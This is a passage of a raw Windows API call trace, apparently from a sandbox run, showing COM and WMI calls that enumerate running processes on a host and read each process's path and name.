[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514888) returned 0x0 [0264.698] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0264.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514888, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514888) returned 0x0 [0264.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514888, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514888, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.698] WbemDefPath:IUnknown:AddRef (This=0x5514888) returned 0x3 [0264.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514888, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514888, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514888, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x551dc28) returned 0x0 [0264.699] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x551dc28, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.699] WbemDefPath:IUnknown:Release (This=0x551dc28) returned 0x3 [0264.699] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.699] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.699] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514888, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.699] WbemDefPath:IUnknown:Release (This=0x5514888) returned 0x2 [0264.699] WbemDefPath:IUnknown:Release (This=0x5514888) returned 0x1 [0264.699] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.699] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.699] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514888, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514888) returned 0x0 [0264.699] WbemDefPath:IUnknown:AddRef (This=0x5514888) returned 0x3 [0264.699] WbemDefPath:IUnknown:Release (This=0x5514888) returned 0x2 [0264.699] WbemDefPath:IWbemPath:SetText (This=0x5514888, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3776\"") returned 0x0 [0264.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.699] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.699] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.700] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.700] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.700] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.700] IWbemClassObject:Get (in: This=0x5518770, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d005c*=0, plFlavor=0x23d0060*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="southern_who_police.exe", varVal2=0x0), pType=0x23d005c*=8, plFlavor=0x23d0060*=0) returned 0x0 [0264.700] SysStringByteLen (bstr="southern_who_police.exe") returned 0x2e [0264.700] SysStringByteLen (bstr="southern_who_police.exe") returned 0x2e [0264.700] IWbemClassObject:Get (in: This=0x5518770, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d005c*=8, plFlavor=0x23d0060*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="southern_who_police.exe", varVal2=0x0), pType=0x23d005c*=8, plFlavor=0x23d0060*=0) returned 0x0 [0264.700] SysStringByteLen (bstr="southern_who_police.exe") returned 0x2e [0264.700] SysStringByteLen (bstr="southern_who_police.exe") returned 0x2e [0264.700] CoTaskMemAlloc (cb=0x4) returned 0x54ba248 [0264.700] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba248, puReturned=0x23c1fd0 | out: apObjects=0x54ba248*=0x5519100, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.701] IUnknown:QueryInterface (in: This=0x5519100, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5519100) returned 0x0 [0264.701] IUnknown:QueryInterface (in: This=0x5519100, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.701] IUnknown:QueryInterface (in: This=0x5519100, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.701] IUnknown:QueryInterface (in: This=0x5519100, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.701] IUnknown:AddRef (This=0x5519100) returned 0x3 [0264.701] IUnknown:QueryInterface (in: This=0x5519100, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.701] IUnknown:QueryInterface (in: This=0x5519100, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.702] IUnknown:QueryInterface (in: This=0x5519100, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5519104) returned 0x0 [0264.702] IMarshal:GetUnmarshalClass (in: This=0x5519104, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.702] IUnknown:Release (This=0x5519104) returned 0x3 [0264.702] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.702] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.702] IUnknown:QueryInterface (in: This=0x5519100, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.702] IUnknown:Release (This=0x5519100) returned 0x2 [0264.702] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.702] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.702] IUnknown:QueryInterface (in: This=0x5519100, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5519100) returned 0x0 [0264.702] IUnknown:AddRef (This=0x5519100) returned 0x4 [0264.702] IUnknown:Release (This=0x5519100) returned 0x3 [0264.702] IUnknown:Release (This=0x5519100) returned 0x2 [0264.702] CoTaskMemFree (pv=0x54ba248) [0264.702] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.702] IUnknown:AddRef (This=0x5519100) returned 0x3 [0264.702] IWbemClassObject:Get (in: This=0x5519100, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.702] IWbemClassObject:Get (in: This=0x5519100, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3272\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.702] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3272\"") returned 0x5e [0264.703] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3272\"") returned 0x5e [0264.703] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.703] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.703] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.703] IUnknown:Release (This=0x601a94) returned 0x1 [0264.703] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba248) returned 0x0 [0264.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba248, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.704] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba248, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514ea8) returned 0x0 [0264.704] WbemDefPath:IUnknown:Release (This=0x54ba248) returned 0x0 [0264.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ea8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514ea8) returned 0x0 [0264.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ea8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ea8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.704] WbemDefPath:IUnknown:AddRef (This=0x5514ea8) returned 0x3 [0264.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ea8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ea8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ea8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x551dbf8) returned 0x0 [0264.704] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x551dbf8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.704] WbemDefPath:IUnknown:Release (This=0x551dbf8) returned 0x3 [0264.705] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.705] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.705] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ea8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.705] WbemDefPath:IUnknown:Release (This=0x5514ea8) returned 0x2 [0264.705] WbemDefPath:IUnknown:Release (This=0x5514ea8) returned 0x1 [0264.705] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.705] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.705] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ea8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514ea8) returned 0x0 [0264.705] WbemDefPath:IUnknown:AddRef (This=0x5514ea8) returned 0x3 [0264.705] WbemDefPath:IUnknown:Release (This=0x5514ea8) returned 0x2 [0264.705] WbemDefPath:IWbemPath:SetText (This=0x5514ea8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3272\"") returned 0x0 [0264.705] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.705] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.705] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.705] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.705] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.705] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.705] IWbemClassObject:Get (in: This=0x5519100, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d0918*=0, plFlavor=0x23d091c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="administration somebody few.exe", varVal2=0x0), pType=0x23d0918*=8, plFlavor=0x23d091c*=0) returned 0x0 [0264.705] SysStringByteLen (bstr="administration somebody few.exe") returned 0x3e [0264.705] SysStringByteLen (bstr="administration somebody few.exe") returned 0x3e [0264.706] IWbemClassObject:Get (in: This=0x5519100, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d0918*=8, plFlavor=0x23d091c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="administration somebody few.exe", varVal2=0x0), pType=0x23d0918*=8, plFlavor=0x23d091c*=0) returned 0x0 [0264.706] SysStringByteLen (bstr="administration somebody few.exe") returned 0x3e [0264.706] SysStringByteLen (bstr="administration somebody few.exe") returned 0x3e [0264.706] CoTaskMemAlloc (cb=0x4) returned 0x54ba308 [0264.706] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba308, puReturned=0x23c1fd0 | out: apObjects=0x54ba308*=0x5518aa0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.707] IUnknown:QueryInterface (in: This=0x5518aa0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5518aa0) returned 0x0 [0264.707] IUnknown:QueryInterface (in: This=0x5518aa0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.707] IUnknown:QueryInterface (in: This=0x5518aa0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.707] IUnknown:QueryInterface (in: This=0x5518aa0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.707] IUnknown:AddRef (This=0x5518aa0) returned 0x3 [0264.707] IUnknown:QueryInterface (in: This=0x5518aa0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.707] IUnknown:QueryInterface (in: This=0x5518aa0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.707] IUnknown:QueryInterface (in: This=0x5518aa0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5518aa4) returned 0x0 [0264.709] IMarshal:GetUnmarshalClass (in: This=0x5518aa4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.709] IUnknown:Release (This=0x5518aa4) returned 0x3 [0264.710] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.710] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.710] IUnknown:QueryInterface (in: This=0x5518aa0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.710] IUnknown:Release (This=0x5518aa0) returned 0x2 [0264.710] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.710] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.710] IUnknown:QueryInterface (in: This=0x5518aa0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5518aa0) returned 0x0 [0264.710] IUnknown:AddRef (This=0x5518aa0) returned 0x4 [0264.710] IUnknown:Release (This=0x5518aa0) returned 0x3 [0264.710] IUnknown:Release (This=0x5518aa0) returned 0x2 [0264.710] CoTaskMemFree (pv=0x54ba308) [0264.710] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.710] IUnknown:AddRef (This=0x5518aa0) returned 0x3 [0264.710] IWbemClassObject:Get (in: This=0x5518aa0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.710] IWbemClassObject:Get (in: This=0x5518aa0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | 